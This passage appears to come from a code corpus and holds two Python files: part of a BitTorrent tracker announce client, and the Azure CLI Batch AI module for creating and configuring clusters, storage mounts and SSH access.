s += '&event=' + ['started', 'completed', 'stopped'][event]
if event == 2:
self.stopped = True
self.rerequest(s, callback)
def snoop(self, peers, callback = lambda: None): # tracker call support
self.rerequest(self.url
+'&event=stopped&port=0&uploaded=0&downloaded=0&left=1&tracker=1&numwant='
+str(peers), callback)
def rerequest(self, s, callback):
if not self.lock.isfinished(): # still waiting for prior cycle to complete??
def retry(self = self, s = s, callback = callback):
self.rerequest(s, callback)
self.sched(retry, 5) # retry in 5 seconds
return
self.lock.reset()
rq = Thread(target = self._rerequest, args = [s, callback])
rq.setDaemon(False)
rq.start()
def _rerequest(self, s, callback):
try:
def fail(self = self, callback = callback):
self._fail(callback)
if self.ip:
try:
s += '&ip=' + gethostbyname(self.ip)
except:
self.errorcodes['troublecode'] = 'unable to resolve: '+self.ip
self.externalsched(fail)
self.errorcodes = {}
if self.special is None:
for t in range(len(self.trackerlist)):
for tr in range(len(self.trackerlist[t])):
tracker = self.trackerlist[t][tr]
if self.rerequest_single(tracker, s, callback):
if not self.last_failed and tr != 0:
del self.trackerlist[t][tr]
self.trackerlist[t] = [tracker] + self.trackerlist[t]
return
else:
tracker = self.special
self.special = None
if self.rerequest_single(tracker, s, callback):
return
# no success from any tracker
self.externalsched(fail)
except:
self.exception(callback)
def _fail(self, callback):
if ( (self.upratefunc() < 100 and self.downratefunc() < 100)
or not self.amount_left() ):
for f in ['rejected', 'bad_data', 'troublecode']:
if self.errorcodes.has_key(f):
r = self.errorcodes[f]
break
else:
r = 'Problem connecting to tracker - unspecified error'
self.errorfunc(r)
self.last_failed = True
self.lock.give_up()
self.externalsched(callback)
def rerequest_single(self, t, s, callback):
l = self.lock.set()
rq = Thread(target = self._rerequest_single, args = [t, s+get_key(t), l, callback])
rq.setDaemon(False)
rq.start()
self.lock.wait()
if self.lock.success:
self.lastsuccessful = t
self.last_failed = False
self.never_succeeded = False
return True
if not self.last_failed and self.lastsuccessful == t:
# if the last tracker hit was successful, and you've just tried the tracker
# you'd contacted before, don't go any further, just fail silently.
self.last_failed = True
self.externalsched(callback)
self.lock.give_up()
return True
return False # returns true if it wants rerequest() to exit
def _rerequest_single(self, t, s, l, callback):
try:
closer = [None]
def timedout(self = self, l = l, closer = closer):
if self.lock.trip(l):
self.errorcodes['troublecode'] = 'Problem connecting to tracker - timeout exceeded'
self.lock.unwait(l)
try:
closer[0]()
except:
pass
self.externalsched(timedout, self.timeout)
err = None
try:
h = urlopen(t+s)
closer[0] = h.close
data = h.read()
except (IOError, error), e:
err = 'Problem connecting to tracker - ' + str(e)
except:
err = 'Problem connecting to tracker'
try:
h.close()
except:
pass
if err:
if self.lock.trip(l):
self.errorcodes['troublecode'] = err
self.lock.unwait(l)
return
if not data:
if self.lock.trip(l):
self.errorcodes['troublecode'] = 'no data from tracker'
self.lock.unwait(l)
return
try:
r = bdecode(data, sloppy=1)
check_peers(r)
except ValueError, e:
if self.lock.trip(l):
self.errorcodes['bad_data'] = 'bad data from tracker - ' + str(e)
self.lock.unwait(l)
return
if r.has_key('failure reason'):
if self.lock.trip(l):
self.errorcodes['rejected'] = self.rejectedmessage + r['failure reason']
self.lock.unwait(l)
return
if self.lock.trip(l, True): # success!
self.lock.unwait(l)
else:
callback = lambda: None # attempt timed out, don't do a callback
# even if the attempt timed out, go ahead and process data
def add(self = self, r = r, callback = callback):
self.postrequest(r, callback)
self.externalsched(add)
except:
self.exception(callback)
def postrequest(self, r, callback):
if r.has_key('warning message'):
self.errorfunc('warning from tracker - ' + r['warning message'])
self.announce_interval = r.get('interval', self.announce_interval)
self.interval = r.get('min interval', self.interval)
self.trackerid = r.get('tracker id', self.trackerid)
self.last = r.get('last')
# ps = len(r['peers']) + self.howmany()
p = r['peers']
peers = []
if type(p) == type(''):
for x in xrange(0, len(p), 6):
ip = '.'.join([str(ord(i)) for i in p[x:x+4]])
port = (ord(p[x+4]) << 8) | ord(p[x+5])
peers.append(((ip, port), 0))
else:
for x in p:
peers.append(((x['ip'].strip(), x['port']), x.get('peer id', 0)))
ps = len(peers) + self.howmany()
if ps < self.maxpeers:
if self.doneflag.isSet():
if r.get('num peers', 1000) - r.get('done peers', 0) > ps * 1.2:
self.last = None
else:
if r.get('num peers', 1000) > ps * 1.2:
self.last = None
if peers:
shuffle(peers)
self.connect(peers)
callback()
def exception(self, callback):
data = StringIO()
print_exc(file = data)
def r(s = data.getvalue(), callback = callback):
if self.excfunc:
self.excfunc(s)
else:
print s
callback()
self.externalsched(r)
class SuccessLock:
def __init__(self):
self.lock = Lock()
self.pause = Lock()
self.code = 0L
self.success = False
self.finished = True
def reset(self):
self.success = False
self.finished = False
def set(self):
self.lock.acquire()
if not self.pause.locked():
self.pause.acquire()
self.first = True
self.code += 1L
self.lock.release()
return self.code
def trip(self, code, s = False):
self.lock.acquire()
try:
if code == self.code and not self.finished:
r = self.first
self.first = False
if s:
self.finished = True
self.success = True
return r
finally:
self.lock.release()
def give_up(self):
self.lock.acquire()
self.success = False
self.finished = True
self.lock.release()
def wait(self):
self.pause.acquire()
def unwait(self, code):
if code == self.code and self.pause.locked():
self.pause.release()
def isfinished(self):
self.lock.acquire()
x = self.finished
self.lock.release()
return x
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=too-many-lines
import collections
import copy
import datetime
import json
import os
import signal
import socket
import string
import sys
import threading
import time
from functools import partial
from random import shuffle
import paramiko
import requests
from knack.log import get_logger
from knack.util import CLIError
from msrest.serialization import Deserializer
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from six.moves import urllib_parse
from azure.cli.core import keys
from azure.cli.core.util import get_default_admin_username
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.profiles import ResourceType, get_sdk
import azure.mgmt.batchai.models as models
# Environment variables for specifying azure storage account and key. We want the user to make explicit
# decision about which storage account to use instead of using his default account specified via AZURE_STORAGE_ACCOUNT
# and AZURE_STORAGE_KEY.
AZURE_BATCHAI_STORAGE_ACCOUNT = 'AZURE_BATCHAI_STORAGE_ACCOUNT'
AZURE_BATCHAI_STORAGE_KEY = 'AZURE_BATCHAI_STORAGE_KEY'
MSG_CONFIGURE_STORAGE_ACCOUNT = 'Please configure Azure Storage account name via AZURE_BATCHAI_STORAGE_ACCOUNT or ' \
'provide storage_account value in batchai section of your az configuration file.'
MSG_CONFIGURE_STORAGE_KEY = 'Please configure Azure Storage account key via AZURE_BATCHAI_STORAGE_KEY or ' \
'provide storage_key value in batchai section of your az configuration file.'
STANDARD_OUTPUT_DIRECTORY_ID = 'stdouterr'
# Parameters of auto storage
AUTO_STORAGE_RESOURCE_GROUP = 'batchaiautostorage'
AUTO_STORAGE_CONTAINER_NAME = 'batchaicontainer'
AUTO_STORAGE_SHARE_NAME = 'batchaishare'
AUTO_STORAGE_ACCOUNT_PREFIX = 'bai'
AUTO_STORAGE_CONTAINER_PATH = 'autobfs'
AUTO_STORAGE_SHARE_PATH = 'autoafs'
# Placeholders which customer may use in his config file for cluster creation.
AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER = '<{0}>'.format(AZURE_BATCHAI_STORAGE_KEY)
AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER = '<{0}>'.format(AZURE_BATCHAI_STORAGE_ACCOUNT)
# Default expiration time for file download URLs.
DEFAULT_URL_EXPIRY_MIN = 60
# Supported images.
SUPPORTED_IMAGE_ALIASES = {
"UbuntuLTS": models.ImageReference(
publisher='Canonical',
offer='UbuntuServer',
sku='16.04-LTS'
),
"UbuntuDSVM": models.ImageReference(
publisher='microsoft-ads',
offer='linux-data-science-vm-ubuntu',
sku='linuxdsvmubuntu'
)
}
# Type of entries reported by list startup files.
LogFile = collections.namedtuple('LogFile', 'name download_url is_directory size')
logger = get_logger(__name__)
def _get_resource_group_location(cli_ctx, resource_group):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
return client.resource_groups.get(resource_group).location
def _get_workspace_location(client, resource_group, workspace_name):
workspace = client.workspaces.get(resource_group, workspace_name)
return workspace.location
def _get_default_ssh_public_key_location():
path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub')
if os.path.exists(path):
return path
return None
def _get_deserializer():
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
return Deserializer(client_models)
def _ensure_resource_not_exist(client, resource_group, workspace, name):
try:
client.get(resource_group, workspace, name)
raise CLIError('"{0}" already exists in "{1}" resource group under {2} resource group.'.format(
name, resource_group, workspace))
except CloudError as e:
if e.status_code != 404:
raise
def _ensure_job_not_exist(client, resource_group, workspace, experiment, name):
try:
client.get(resource_group, workspace, experiment, name)
raise CLIError('A job with given name, experiment, workspace and resource group already exists.')
except CloudError as e:
if e.status_code != 404:
raise
def _ensure_subnet_is_valid(client, subnet, nfs_resource_group, nfs_workspace, nfs_name):
if not subnet:
return
if not is_valid_resource_id(subnet):
raise CLIError('Ill-formed subnet resource id')
# check there are no conflicts between provided subnet and mounted nfs
if not nfs_name:
return
nfs = None # type: models.FileServer
try:
nfs = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
except CloudError as e:
if e.status_code != 404:
raise
if not nfs:
# CLI will return the error during nfs validation
return
if nfs.subnet.id != subnet:
raise CLIError('Cluster and mounted NFS must be in the same subnet.')
def _get_storage_management_client(cli_ctx):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_STORAGE)
def _get_storage_account_key(cli_ctx, account_name, account_key):
"""Returns account key for the given storage account.
:param str account_name: storage account name.
:param str or None account_key: account key provide as command line argument.
"""
if account_key:
return account_key
storage_client = _get_storage_management_client(cli_ctx)
account = [a.id for a in list(storage_client.storage_accounts.list()) if a.name == account_name]
if not account:
raise CLIError('Cannot find "{0}" storage account.'.format(account_name))
resource_group = parse_resource_id(account[0])['resource_group']
keys_list_result = storage_client.storage_accounts.list_keys(resource_group, account_name)
if not keys_list_result or not keys_list_result.keys:
raise CLIError('Cannot find a key for "{0}" storage account.'.format(account_name))
return keys_list_result.keys[0].value
def _get_effective_storage_account_name_and_key(cli_ctx, account_name, account_key):
"""Returns storage account name and key to be used.
:param str or None account_name: storage account name provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
"""
if account_name:
return account_name, _get_storage_account_key(cli_ctx, account_name, account_key) or ''
return cli_ctx.config.get('batchai', 'storage_account', ''), cli_ctx.config.get('batchai', 'storage_key', '')
def _get_account_name_from_azure_file_url(azure_file_url):
"""Extracts account name from Azure File URL
:param str azure_file_url: Azure File URL
:return str: account name
"""
if not azure_file_url:
raise CLIError('Azure File URL cannot absent or be empty')
o = urllib_parse.urlparse(azure_file_url)
try:
account, _ = o.netloc.split('.', 1)
return account
except ValueError:
raise CLIError('Ill-formed Azure File URL "{0}"'.format(azure_file_url))
def _get_effective_credentials(cli_ctx, existing_credentials, account_name):
"""Returns AzureStorageCredentialInfo for the account
:param models.AzureStorageCredentialsInfo existing_credentials: known credentials
:param str account_name: storage account name
:return models.AzureStorageCredentialsInfo: credentials to be used
"""
if existing_credentials and (existing_credentials.account_key or existing_credentials.account_key_secret_reference):
return existing_credentials
return models.AzureStorageCredentialsInfo(
account_key=_get_storage_account_key(cli_ctx, account_name, account_key=None))
def _patch_mount_volumes(cli_ctx, volumes, account_name=None, account_key=None):
"""Patches mount volumes by replacing placeholders and adding credentials information.
:param models.MountVolumes or None volumes: mount volumes.
:param str or None account_name: name of the storage account provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
:return models.ClusterCreateParameters: updated parameters.
"""
if volumes is None:
return None
result = copy.deepcopy(volumes) # type: models.MountVolumes
storage_account_name, storage_account_key = _get_effective_storage_account_name_and_key(
cli_ctx, account_name, account_key)
require_storage_account = False
require_storage_account_key = False
# Patch parameters of azure file share.
if result.azure_file_shares:
for ref in result.azure_file_shares:
# Populate account name if it was not provided
if not ref.account_name:
ref.account_name = _get_account_name_from_azure_file_url(ref.azure_file_url)
# Replace placeholders
if ref.account_name == AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER:
require_storage_account = True
ref.account_name = storage_account_name
if ref.azure_file_url and AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER in ref.azure_file_url:
require_storage_account = True
ref.azure_file_url = ref.azure_file_url.replace(
AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER, storage_account_name)
if ref.credentials and ref.credentials.account_key == AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER:
require_storage_account_key = True
ref.credentials.account_key = storage_account_key
if not ref.credentials and ref.account_name == storage_account_name:
require_storage_account_key = True
ref.credentials = models.AzureStorageCredentialsInfo(account_key=storage_account_key)
if ref.account_name:
ref.credentials = _get_effective_credentials(cli_ctx, ref.credentials, ref.account_name)
# Patch parameters of blob file systems.
if result.azure_blob_file_systems:
for ref in result.azure_blob_file_systems:
# Replace placeholders
if ref.account_name == AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER:
require_storage_account = True
ref.account_name = storage_account_name
if ref.credentials and ref.credentials.account_key == AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER:
require_storage_account_key = True
ref.credentials.account_key = storage_account_key
if not ref.credentials and ref.account_name == storage_account_name:
require_storage_account_key = True
ref.credentials = models.AzureStorageCredentialsInfo(account_key=storage_account_key)
# Populate the rest of credentials based on the account name
if not ref.account_name:
raise CLIError('Ill-formed Azure Blob File System reference in the configuration file - no account '
'name provided.')
if ref.account_name:
ref.credentials = _get_effective_credentials(cli_ctx, ref.credentials, ref.account_name)
if require_storage_account and not storage_account_name:
raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
if require_storage_account_key and not storage_account_key:
raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
return result
def _update_user_account_settings(params, admin_user_name, ssh_key, password):
"""Update account settings of cluster or file server creation parameters
:param models.ClusterCreateParameters or models.FileServerCreateParameters params: params to update
:param str or None admin_user_name: name of admin user to create.
:param str or None ssh_key: ssh public key value or path to the file containing the key.
:param str or None password: password.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(params)
if hasattr(result, 'user_account_settings'):
parent = result
else:
if result.ssh_configuration is None:
result.ssh_configuration = models.SshConfiguration(user_account_settings=None)
parent = result.ssh_configuration
if parent.user_account_settings is None:
parent.user_account_settings = models.UserAccountSettings(admin_user_name=None)
# Get effective user name, password and key trying them in the following order: provided via command line,
# provided in the config file, current user name and his default public ssh key.
effective_user_name = admin_user_name or parent.user_account_settings.admin_user_name or get_default_admin_username() # pylint: disable=line-too-long
effective_password = password or parent.user_account_settings.admin_user_password
# Use default ssh public key only if no password is configured.
effective_key = (ssh_key or parent.user_account_settings.admin_user_ssh_public_key or
(None if effective_password else _get_default_ssh_public_key_location()))
if effective_key:
if os.path.exists(os.path.expanduser(effective_key)):
with open(os.path.expanduser(effective_key)) as f:
effective_key = f.read()
try:
if effective_key and not keys.is_valid_ssh_rsa_public_key(effective_key):
raise CLIError('Incorrect ssh public key value.')
except Exception:
raise CLIError('Incorrect ssh public key value.')
parent.user_account_settings.admin_user_name = effective_user_name
parent.user_account_settings.admin_user_ssh_public_key = effective_key
parent.user_account_settings.admin_user_password = effective_password
if not parent.user_account_settings.admin_user_name:
raise CLIError('Please provide admin user name.')
if (not parent.user_account_settings.admin_user_ssh_public_key and
not parent.user_account_settings.admin_user_password):
raise CLIError('Please provide admin user password or ssh key.')
return result
def _add_nfs_to_mount_volumes(volumes, file_server_id, mount_path):
"""Adds NFS to the mount volumes.
:param models.MountVolumes or None volumes: existing mount volumes.
:param str file_server_id: resource id of the file server.
:param str mount_path: relative mount path for the file server.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
if not mount_path:
raise CLIError('File server relative mount path cannot be empty.')
if result.file_servers is None:
result.file_servers = []
result.file_servers.append(models.FileServerReference(
relative_mount_path=mount_path,
file_server=models.ResourceId(id=file_server_id),
mount_options="rw"))
return result
def _get_azure_file_url(cli_ctx, account_name, azure_file_share):
"""Returns Azure File URL for the given account
:param str account_name: account name
:param str azure_file_share: name of the share
:return str: Azure File URL to be used in mount volumes
"""
return 'https://{0}.file.{1}/{2}'.format(account_name, cli_ctx.cloud.suffixes.storage_endpoint, azure_file_share)
def _add_azure_file_share_to_mount_volumes(cli_ctx, volumes, azure_file_share, mount_path, account_name=None,
account_key=None):
"""Add Azure File share to the mount volumes.
:param model.MountVolumes volumes: existing mount volumes.
:param str azure_file_share: name of the azure file share.
:param str mount_path: relative mount path for Azure File share.
:param str or None account_name: storage account name provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
if not mount_path:
raise CLIError('Azure File share relative mount path cannot be empty.')
if result.azure_file_shares is None:
result.azure_file_shares = []
effective_account_name, effective_account_key = _get_effective_storage_account_name_and_key(cli_ctx, account_name,
account_key)
if not effective_account_name:
raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
if not effective_account_key:
raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
result.azure_file_shares.append(models.AzureFileShareReference(
relative_mount_path=mount_path,
account_name=effective_account_name,
azure_file_url=_get_azure_file_url(cli_ctx, effective_account_name, azure_file_share),
credentials=models.AzureStorageCredentialsInfo(account_key=effective_account_key)))
return result
def _add_azure_container_to_mount_volumes(cli_ctx, volumes, container_name, mount_path, account_name=None,
account_key=None):
"""Add Azure Storage container to the mount volumes.
:param model.MountVolumes: existing mount volumes.
:param str container_name: container name.
:param str mount_path: relative mount path for the container.
:param str or None account_name: storage account name provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
if not mount_path:
raise CLIError('Azure Storage Container relative mount path cannot be empty.')
if result.azure_blob_file_systems is None:
result.azure_blob_file_systems = []
storage_account_name, storage_account_key = _get_effective_storage_account_name_and_key(cli_ctx, account_name,
account_key)
if not storage_account_name:
raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
if not storage_account_key:
raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
result.azure_blob_file_systems.append(models.AzureBlobFileSystemReference(
relative_mount_path=mount_path,
account_name=storage_account_name,
container_name=container_name,
credentials=models.AzureStorageCredentialsInfo(account_key=storage_account_key)))
return result
def _get_image_reference(image, custom_image):
"""Returns image reference for the given image and custom image.
:param str image or None: image alias or full spec.
:param str custom_image or None: resource id of the custom image.
:raise CLIError: if the image with given alias was not found.
"""
if custom_image and not image:
raise CLIError('You need to specify --image argument with information about the custom image')
if custom_image and not is_valid_resource_id(custom_image):
raise CLIError('Ill-formed custom image resource id')
if ':' in image:
# full image specification is provided
try:
publisher, offer, sku, version = image.split(':')
if not publisher:
raise CLIError('Image publisher must be provided in --image argument')
if not offer:
raise CLIError('Image offer must be provided in --image argument')
if not sku:
raise CLIError('Image sku must be provided in --image argument')
return models.ImageReference(
publisher=publisher,
offer=offer,
sku=sku,
version=version or None,
virtual_machine_image_id=custom_image
)
except ValueError:
raise CLIError('--image must have format "publisher:offer:sku:version" or "publisher:offer:sku:"')
# image alias is used
reference = None
for alias, value in SUPPORTED_IMAGE_ALIASES.items():
if alias.lower() == image.lower():
reference = value
if not reference:
raise CLIError('Unsupported image alias "{0}", supported aliases are {1}'.format(
image, ', '.join(SUPPORTED_IMAGE_ALIASES.keys())))
result = copy.deepcopy(reference)
result.virtual_machine_image_id = custom_image
return result
def _get_scale_settings(initial_count, min_count, max_count):
"""Returns scale settings for a cluster with given parameters"""
if not initial_count and not min_count and not max_count:
# Get from the config file
return None
if sum([1 if v is not None else 0 for v in (min_count, max_count)]) == 1:
raise CLIError('You need to either provide both min and max node counts or not provide any of them')
if min_count is not None and max_count is not None and min_count > max_count:
raise CLIError('Maximum nodes count must be greater or equal to minimum nodes count')
if min_count == max_count:
if min_count is None or initial_count == min_count:
return models.ScaleSettings(
manual=models.ManualScaleSettings(target_node_count=initial_count))
if initial_count is None:
return models.ScaleSettings(
manual=models.ManualScaleSettings(target_node_count=min_count)
)
return models.ScaleSettings(
auto_scale=models.AutoScaleSettings(
minimum_node_count=min_count,
maximum_node_count=max_count,
initial_node_count=initial_count or 0))
def _update_nodes_information(params, image, custom_image, vm_size, vm_priority, target, min_nodes, max_nodes):
"""Updates cluster's nodes information.
:param models.ClusterCreateParameters params: cluster create parameters.
:param str or None image: image.
:param str or None custom_image: custom image resource id.
:param str or None vm_size: VM size.
:param str vm_priority: Priority.
:param int or None target: initial number of nodes.
:param int or None min_nodes: min number of nodes.
:param int or None max_nodes: max number of nodes.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(params)
if vm_size:
result.vm_size = vm_size
if not result.vm_size:
raise CLIError('Please provide VM size')
if vm_priority:
result.vm_priority = vm_priority
if image or custom_image:
result.virtual_machine_configuration = models.VirtualMachineConfiguration(
image_reference=_get_image_reference(image, custom_image))
scale_settings = _get_scale_settings(target, min_nodes, max_nodes)
if scale_settings:
result.scale_settings = scale_settings
if not result.scale_settings or (not result.scale_settings.manual and not result.scale_settings.auto_scale):
raise CLIError('Please provide scale setting for the cluster via command line or configuration file')
return result
def _get_auto_storage_resource_group():
return AUTO_STORAGE_RESOURCE_GROUP
def _configure_auto_storage(cli_ctx, location):
"""Configures auto storage account for the cluster
:param str location: location for the auto-storage account.
:return (str, str): a tuple with auto storage account name and key.
"""
ResourceGroup = get_sdk(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES, 'ResourceGroup', mod='models')
BlockBlobService, FileService = get_sdk(cli_ctx, ResourceType.DATA_STORAGE,
'blob#BlockBlobService', 'file#FileService')
resource_group = _get_auto_storage_resource_group()
resource_client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
if resource_client.resource_groups.check_existence(resource_group):
logger.warning('BatchAI will use existing %s resource group for auto-storage account',
resource_group)
else:
logger.warning('Creating %s resource group for auto-storage account', resource_group)
resource_client.resource_groups.create_or_update(
resource_group, ResourceGroup(location=location))
storage_client = _get_storage_management_client(cli_ctx)
account = None
for a in storage_client.storage_accounts.list_by_resource_group(resource_group):
if a.primary_location == location.lower().replace(' ', ''):
account = a.name
logger.warning('Using existing %s storage account as an auto-storage account', account)
break
if account is None:
account = _create_auto_storage_account(storage_client, resource_group, location)
logger.warning('Created auto storage account %s', account)
key = _get_storage_account_key(cli_ctx, account, None)
file_service = FileService(account, key)
file_service.create_share(AUTO_STORAGE_SHARE_NAME, fail_on_exist=False)
blob_service = BlockBlobService(account, key)
blob_service.create_container(AUTO_STORAGE_CONTAINER_NAME, fail_on_exist=False)
return account, key
def _generate_auto_storage_account_name():
"""Generates unique name for auto storage account"""
characters = list(string.ascii_lowercase * 12)
shuffle(characters)
return AUTO_STORAGE_ACCOUNT_PREFIX + ''.join(characters[:12])
def _create_auto_storage_account(storage_client, resource_group, location):
"""Creates new auto storage account in the given resource group and location
:param StorageManagementClient storage_client: storage client.
:param str resource_group: name of the resource group.
:param str location: location.
:return str: name of the created storage account.
"""
from azure.mgmt.storage.models import Kind, Sku, SkuName
name = _generate_auto_storage_account_name()
check = storage_client.storage_accounts.check_name_availability(name)
while not check.name_available:
name = _generate_auto_storage_account_name()
check = storage_client.storage_accounts.check_name_availability(name).name_available
storage_client.storage_accounts.create(resource_group, name, {
'sku': Sku(name=SkuName.standard_lrs),
'kind': Kind.storage,
'location': location}).result()
return name
def _add_setup_task(cmd_line, output, cluster):
"""Adds a setup task with given command line and output destination to the cluster.
:param str cmd_line: node setup command line.
:param str output: output destination.
:param models.ClusterCreateParameters cluster: cluster creation parameters.
"""
if cmd_line is None:
return cluster
if output is None:
raise CLIError('--setup-task requires providing of --setup-task-output')
cluster = copy.deepcopy(cluster)
cluster.node_setup = cluster.node_setup or models.NodeSetup()
cluster.node_setup.setup_task = models.SetupTask(
command_line=cmd_line,
std_out_err_path_prefix=output,
run_elevated=False)
return cluster
def _generate_ssh_keys():
"""Generates ssh keys pair"""
private_key_path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa')
public_key_path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub')
keys.generate_ssh_keys(private_key_path, public_key_path)
logger.warning('Attempted to find or generate SSH key files id_rsa and id_rsa.pub under ~/.ssh to allow SSH access '
'to the nodes. If using machines without permanent storage, back up your keys to a safe location.')
def list_workspaces(client, resource_group=None):
if resource_group:
return client.list_by_resource_group(resource_group)
return client.list()
def create_workspace(cmd, client, resource_group, workspace_name, location=None):
location = location or _get_resource_group_location(cmd.cli_ctx, resource_group)
return client.create(resource_group, workspace_name, location).result()
def create_experiment(client, resource_group, workspace_name, experiment_name):
return client.create(resource_group, workspace_name, experiment_name).result()
def _get_effective_resource_parameters(name_or_id, resource_group, workspace):
"""Returns effective resource group, workspace and name for the given resource"""
if not name_or_id:
return None, None, None
if is_valid_resource_id(name_or_id):
parts = parse_resource_id(name_or_id)
return parts['resource_group'], parts['name'], parts['resource_name']
return resource_group, workspace, name_or_id
def create_cluster(cmd, client, # pylint: disable=too-many-locals
resource_group, workspace_name, cluster_name, json_file=None, user_name=None,
ssh_key=None, password=None, generate_ssh_keys=None, image=None, custom_image=None,
use_auto_storage=False, vm_size=None, vm_priority=None, target=None, min_nodes=None,
max_nodes=None, subnet=None, nfs=None, nfs_mount_path='nfs', azure_file_share=None,
afs_mount_path='afs', container_name=None, container_mount_path='bfs', account_name=None,
account_key=None, setup_task=None, setup_task_output=None):
if generate_ssh_keys:
_generate_ssh_keys()
if ssh_key is None:
ssh_key = _get_default_ssh_public_key_location()
_ensure_resource_not_exist(client.clusters, resource_group, workspace_name, cluster_name)
nfs_resource_group, nfs_workspace, nfs_name = _get_effective_resource_parameters(
nfs, resource_group, workspace_name)
_ensure_subnet_is_valid(client, subnet, nfs_resource_group, nfs_workspace, nfs_name)
if json_file:
with open(json_file) as f:
json_obj = json.load(f)
params = _get_deserializer()('ClusterCreateParameters', json_obj)
else:
# noinspection PyTypeChecker
params = models.ClusterCreateParameters(vm_size=None, user_account_settings=None)
if params.node_setup:
params.node_setup.mount_volumes = _patch_mount_volumes(
cmd.cli_ctx, params.node_setup.mount_volumes, account_name, account_key)
params = _update_user_account_settings(params, user_name, ssh_key, password)
params = _update_nodes_information(params, image, custom_image, vm_size, vm_priority, target, min_nodes, max_nodes)
if nfs_name or azure_file_share or container_name:
params.node_setup = params.node_setup or models.NodeSetup()
mount_volumes = params.node_setup.mount_volumes if params.node_setup else None
if nfs_name:
file_server = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
mount_volumes = _add_nfs_to_mount_volumes(mount_volumes, file_server.id, nfs_mount_path)
if azure_file_share:
mount_volumes = _add_azure_file_share_to_mount_volumes(cmd.cli_ctx, mount_volumes, azure_file_share,
afs_mount_path, account_name, account_key)
if container_name:
mount_volumes = _add_azure_container_to_mount_volumes(cmd.cli_ctx, mount_volumes, container_name,
container_mount_path, account_name, account_key)
if use_auto_storage:
auto_storage_account, auto_storage_key = _configure_auto_storage(
cmd.cli_ctx, _get_workspace_location(client, resource_group, workspace_name))
mount_volumes = _add_azure_file_share_to_mount_volumes(
cmd.cli_ctx, mount_volumes, AUTO_STORAGE_SHARE_NAME, AUTO_STORAGE_SHARE_PATH,
auto_storage_account, auto_storage_key)
mount_volumes = _add_azure_container_to_mount_volumes(
cmd.cli_ctx, mount_volumes, AUTO_STORAGE_CONTAINER_NAME, AUTO_STORAGE_CONTAINER_PATH,
auto_storage_account, auto_storage_key)
if mount_volumes:
if params.node_setup is None:
params.node_setup = models.NodeSetup()
params.node_setup.mount_volumes = mount_volumes
if subnet:
params.subnet = models.ResourceId(id=subnet)
if setup_task:
params = _add_setup_task(setup_task, setup_task_output, params)
return client.clusters.create(resource_group, workspace_name, cluster_name, params)
def list_clusters(client, resource_group, workspace_name):
return list(client.list_by_workspace(resource_group, workspace_name))
def resize_cluster(client, resource_group, workspace_name, cluster_name, target):
return client.update(resource_group, workspace_name, cluster_name, scale_settings=models.ScaleSettings(
manual=models.ManualScaleSettings(target_node_count=target)))
def set_cluster_auto_scale_parameters(client, resource_group, workspace_name, cluster_name, min_nodes, max_nodes):
return client.update(resource_group, workspace_name, cluster_name, scale_settings=models.ScaleSettings(
auto_scale=models.AutoScaleSettings(minimum_node_count=min_nodes, maximum_node_count=max_nodes)))
def _is_on_mount_point(path, mount_path):
"""Checks if path is on mount_path"""
path = os.path.normpath(path).replace('\\', '/')
mount_path = os.path.normpath(mount_path).replace('\\', '/')
return path == mount_path or os.path.commonprefix([path, mount_path + '/']) == mount_path + '/'
def list_node_setup_files(cmd, client, resource_group, workspace_name, cluster_name, path='.',
expiry=DEFAULT_URL_EXPIRY_MIN):
cluster = client.get(resource_group, workspace_name, cluster_name) # type: models.Cluster
return _list_node_setup_files_for_cluster(cmd.cli_ctx, cluster, path, expiry)
def _list_node_setup_files_for_cluster(cli_ctx, cluster, path, expiry):
"""Lists node setup task's log files for the given cluster.
:param models.Cluster cluster: the cluster.
:param str path: relative path under cluster node setup task's output directory.
:param int expiry: time in seconds for how long generated SASes will remain valid.
"""
unsupported_location = 'List files is supported only for clusters with startup task configure to store its ' \
'output on Azure File Share or Azure Blob Container'
if cluster.node_setup is None or cluster.node_setup.setup_task is None:
# Nothing to check or return if there is no setup task.
return []
prefix = cluster.node_setup.setup_task.std_out_err_path_prefix
if not _is_on_mount_point(prefix, '$AZ_BATCHAI_MOUNT_ROOT'):
